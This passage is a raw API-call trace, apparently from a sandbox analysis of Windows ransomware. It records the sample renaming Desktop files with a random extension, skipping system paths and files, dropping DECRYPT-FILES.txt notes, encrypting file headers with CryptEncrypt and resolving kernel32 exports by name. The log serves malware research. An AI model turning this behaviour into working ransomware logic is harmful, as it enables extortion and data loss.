[0083.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.008] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.008] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.009] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.009] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.009] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.009] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fSI8D5g.pps") returned 49 [0083.009] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fSI8D5g.pps.z33S0F") returned 56 [0083.009] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fSI8D5g.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fsi8d5g.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fSI8D5g.pps.z33S0F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fsi8d5g.pps.z33s0f"), dwFlags=0x0) returned 1 [0083.009] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.010] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.010] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.010] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ddfaba0, ftCreationTime.dwHighDateTime=0x1d4d326, ftLastAccessTime.dwLowDateTime=0xc22e30a0, ftLastAccessTime.dwHighDateTime=0x1d4d2a9, ftLastWriteTime.dwLowDateTime=0xc22e30a0, ftLastWriteTime.dwHighDateTime=0x1d4d2a9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ggFLb 9Aa", cAlternateFileName="GGFLB9~1")) returned 1 [0083.010] lstrcmpW (lpString1="ggFLb 9Aa", lpString2=".") returned 1 [0083.010] lstrcmpW (lpString1="ggFLb 9Aa", lpString2="..") returned 1 [0083.010] lstrcatW (in: lpString1="ggFLb 9Aa", lpString2="\\" | out: lpString1="ggFLb 9Aa\\") returned="ggFLb 9Aa\\" [0083.010] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="ggFLb 9Aa\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" [0083.010] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="\\Program Files") returned 0x0 [0083.010] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch=":\\Windows") returned 0x0 [0083.010] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="\\Games\\") returned 0x0 [0083.010] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="\\Tor Browser\\") returned 0x0 [0083.010] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="\\ProgramData\\") returned 0x0 [0083.010] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0083.011] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0083.011] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0083.011] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="\\All Users") returned 0x0 [0083.011] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="\\IETldCache\\") returned 0x0 [0083.011] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="\\Local Settings\\") returned 0x0 [0083.011] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="\\AppData\\Local") returned 0x0 [0083.011] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="AhnLab") returned 0x0 [0083.011] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0083.011] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned 48 [0083.011] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0083.011] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\\\jkbimi8.tmp") returned 60 [0083.011] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x438 [0083.011] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned 48 [0083.011] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0083.011] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\\\DECRYPT-FILES.txt") returned 66 [0083.011] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0083.012] WriteFile (in: hFile=0x43c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0083.013] CloseHandle (hObject=0x43c) returned 1 [0083.013] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned 48 [0083.013] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\*" [0083.013] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ddfaba0, ftCreationTime.dwHighDateTime=0x1d4d326, ftLastAccessTime.dwLowDateTime=0xadacbec0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xadacbec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c58 [0083.013] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.013] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ddfaba0, ftCreationTime.dwHighDateTime=0x1d4d326, ftLastAccessTime.dwLowDateTime=0xadacbec0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xadacbec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.013] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.013] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.013] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb75e60, ftCreationTime.dwHighDateTime=0x1d4c59f, ftLastAccessTime.dwLowDateTime=0xb3653a00, ftLastAccessTime.dwHighDateTime=0x1d4c80e, ftLastWriteTime.dwLowDateTime=0xb3653a00, ftLastWriteTime.dwHighDateTime=0x1d4c80e, nFileSizeHigh=0x0, nFileSizeLow=0x1288f, dwReserved0=0x0, dwReserved1=0x0, cFileName="3fm.pps", cAlternateFileName="")) returned 1 [0083.013] lstrcmpiW (lpString1="3fm.pps", lpString2="DECRYPT-FILES.txt") returned -1 [0083.013] lstrcmpiW (lpString1="3fm.pps", lpString2="autorun.inf") returned -1 [0083.013] lstrcmpiW (lpString1="3fm.pps", lpString2="boot.ini") returned -1 [0083.013] lstrcmpiW (lpString1="3fm.pps", lpString2="desktop.ini") returned -1 [0083.013] lstrcmpiW (lpString1="3fm.pps", lpString2="ntuser.dat") returned -1 [0083.013] lstrcmpiW (lpString1="3fm.pps", lpString2="iconcache.db") returned -1 [0083.013] lstrcmpiW (lpString1="3fm.pps", lpString2="bootsect.bak") returned -1 [0083.013] lstrcmpiW (lpString1="3fm.pps", lpString2="ntuser.dat.log") returned -1 [0083.013] lstrcmpiW (lpString1="3fm.pps", lpString2="thumbs.db") returned -1 [0083.013] lstrcmpiW (lpString1="3fm.pps", lpString2="Bootfont.bin") returned -1 [0083.013] lstrlenW (lpString="3fm.pps") returned 7 [0083.013] lstrcmpiW (lpString1="pps", lpString2="lnk") returned 1 [0083.014] lstrcmpiW (lpString1="pps", lpString2="exe") returned 1 [0083.014] lstrcmpiW (lpString1="pps", lpString2="sys") returned -1 [0083.014] lstrcmpiW (lpString1="pps", lpString2="dll") returned 1 [0083.014] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned 48 [0083.014] lstrlenW (lpString="3fm.pps") returned 7 [0083.014] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" [0083.014] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpString2="3fm.pps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\3fm.pps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\3fm.pps" [0083.014] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.014] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\3fm.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\3fm.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0083.014] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=75919) returned 1 [0083.014] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0083.014] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0083.014] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0083.014] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0083.014] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.015] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0083.015] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0083.016] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.017] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0083.017] CloseHandle (hObject=0x444) returned 1 [0083.017] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.018] WriteFile (in: hFile=0x440, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0083.018] CloseHandle (hObject=0x0) returned 0 [0083.018] CloseHandle (hObject=0x440) returned 1 [0083.021] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.021] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.021] GetTickCount () returned 0x114d395 [0083.021] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.023] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.023] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.023] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.023] lstrlenA (lpString="kernel32.dll") returned 12 [0083.024] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.024] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.024] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.024] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.024] lstrlenA (lpString="ADDATOMA") returned 8 [0083.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.024] lstrlenA (lpString="ADDATOMW") returned 8 [0083.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.024] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.024] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.024] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.024] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.024] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.024] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.024] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.024] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.024] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.024] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.024] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.024] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.025] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.025] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.025] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.025] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.025] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.025] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.025] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.025] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.025] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.025] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.025] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.025] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.025] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.025] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.025] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.025] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.025] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.025] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.026] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.026] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.026] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.026] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.026] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.026] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.026] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.026] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.026] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.026] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.026] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.026] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.026] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.026] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.026] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.026] lstrlenA 